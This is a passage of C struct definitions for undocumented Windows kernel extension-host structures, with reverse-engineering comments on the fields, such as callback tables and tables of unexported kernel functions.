    USHORT ExtensionId;
    USHORT ExtensionVersion;
    DWORD FunctionCount;
    POOL_TYPE PoolType;
    PVOID HostInterface;
    PVOID FunctionAddress;
    PVOID ArgForFunction;
    PVOID unk;
} HOST_INFORMATION, *PHOST_INFORMATION;

struct _HOST_LIST_ENTRY
{
    _LIST_ENTRY List;
    DWORD RefCount;
    USHORT ExtensionId;
    USHORT ExtensionVersion;
    USHORT FunctionCount; // number of callbacks that the 
// extension contains
    POOL_TYPE PoolType;   // where this host is allocated
    PVOID HostInterface;  // table of unexported nt functions, 
// to be used by the driver to which
// this extension belongs
    PVOID FunctionAddress; // optional, rarely used. 
// This callback is called before and
// after an extension for this host
// is registered / unregistered
    PVOID ArgForFunction; // will be sent to the function saved here
    _EX_RUNDOWN_REF RundownRef;
    _EX_PUSH_LOCK Lock;
    PVOID FunctionTable;    // a table of the callbacks that 
// the driver “registers”
DWORD Flags;                // Only uses one flag. 
// Not sure about its meaning.
} HOST_LIST_ENTRY, *PHOST_LIST_ENTRY;;

struct _EX_EXTENSION_REGISTRATION_1
{
    USHORT ExtensionId;
    USHORT ExtensionVersion;
    USHORT FunctionCount;
    PVOID FunctionTable;
    PVOID *HostTable;
    PVOID DriverObject;
}EX_EXTENSION_REGISTRATION_1, *PEX_EXTENSION_REGISTRATION_1;